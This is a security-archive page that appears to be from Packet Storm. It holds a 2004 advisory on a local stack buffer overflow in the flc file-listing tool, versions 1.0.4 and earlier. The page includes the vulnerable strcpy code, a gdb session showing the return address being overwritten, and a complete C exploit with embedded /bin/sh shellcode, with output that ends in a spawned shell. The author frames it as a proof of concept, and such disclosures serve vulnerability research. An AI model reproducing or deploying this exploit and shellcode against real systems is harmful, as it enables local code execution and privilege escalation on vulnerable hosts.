exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

flc_exp.c

flc_exp.c
Posted Sep 30, 2004
Authored by CoKi | Site nosystem.com.ar

Local exploit for flc versions 1.0.4 and below. Note that flc is not setuid by default and this is completely proof of concept. Tested on Slackware 10.0.

tags | exploit, local, proof of concept
systems | linux, slackware
SHA-256 | 418b63d366a109a7ec708279fa5ce175e8923a21150f47f353a099403ad65f4c

flc_exp.c

Change Mirror Download
-------------------------------------------------
No System Group - Advisory #06 - 24/09/04
-------------------------------------------------
Program: flc
Homepage: http://ucon64.sourceforge.net/
Vulnerable Versions: flc 1.0.4 and prior
Risk: Low / Medium
Impact: Local Stack Buffer Overflow Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
This may be freely redistributed under the terms
of the GNU Public License flc lists information
about the files in a directory, like 'ls' or 'dir'
commands from the fileutils package. But in addition,
it shows FILE_ID.DIZ information (from files and
archives), ID3 tags (MP3), and MET files (eDonkey
or Overnet) It is very useful for FTP admins or
people who have a lot to do with files.

More informations at: http://ucon64.sourceforge.net/


- DETAILS
-------------------------------------------------
Due to an unsafe copying of parameters from the
command line using strcpy() in flc.c, it is possible
overwrite the return address:

--- flc.c ---
140: if (flc.html)
141: printf ("<html><head><title></title></head><body><pre><tt>");
142: if (optind < argc)
143: {
144: while (optind < argc)
145: strcpy (path, argv[optind++]);
146 }
--- flc.c ---

coki@nosystem:~$ flc `perl -e 'print "A" x 50000'`
Segmentation fault
coki@nosystem:~$

coki@nosystem:~$ gdb flc
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...(no debugging symbols found) ...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 25632'`
Starting program: /home/coki/audit/flc-1.0.4-linux-bin/bin/flc `perl -e 'print " A" x 25632'`
(no debugging symbols found)...(no debugging symbols found)...install.sh N 120 11-03-02 install.sh
flc N 20448 11-03-02 flc
txtextract N 13964 11-03-02 txtextract
id3extract N 16876 11-03-02 id3extract
metextract N 16268 11-03-02 metextract

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r esp ebp eip
esp 0xbfff91d0 0xbfff91d0
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
(gdb) q
The program is running. Exit anyway? (y or n) y
coki@nosystem:~$


- EXPLOIT
-------------------------------------------------

------------------ flc_exp.c --------------------
/* flc local stack buffer overflow exploit
(Proof of Concept)

Tested in Slackware 10.0

by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>

#define BUFFER 25632 + 1

char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

int main(int argc, char *argv[]) {

char *env[3] = {shellcode, NULL};
char buf[BUFFER], *path;
int *buffer = (int *) (buf);
int i, ret;

if(argc != 2) {
printf(" use: %s <path>\n", argv[0]);
exit(0);
}

path = argv[1];

ret = 0xbffffffa - strlen(shellcode) - strlen(path);

for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;

printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

execle(path, "flc", buf, NULL, env);
}

------------------ flc_exp.c --------------------

coki@servidor:~$ make glFTPd-dupe_exp
coki@servidor:~$ ./flc_exp /home/coki/audit/flc-1.0.4-linux-bin/bin/flc

flc <= 1.0.4 local stack buffer overflow (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

WARNING: /home/coki/audit/flc-1.0.4-linux-bin/bin/.flcrc not found: creating...OK

install.sh N 120 11-03-02 install.sh
flc N 20448 11-03-02 flc
txtextract N 13964 11-03-02 txtextract
id3extract N 16876 11-03-02 id3extract
metextract N 16268 11-03-02 metextract
flc_exp.c N 1425 09-24-04 flc_exp.c
flc_exp N 11336 09-24-04 flc_exp
.flcrc N 1162 09-24-04 .flcrc
sh-2.05b$

'flc' is not setuid by default :(


- SOLUTIONS
-------------------------------------------------
No yet


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-06.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close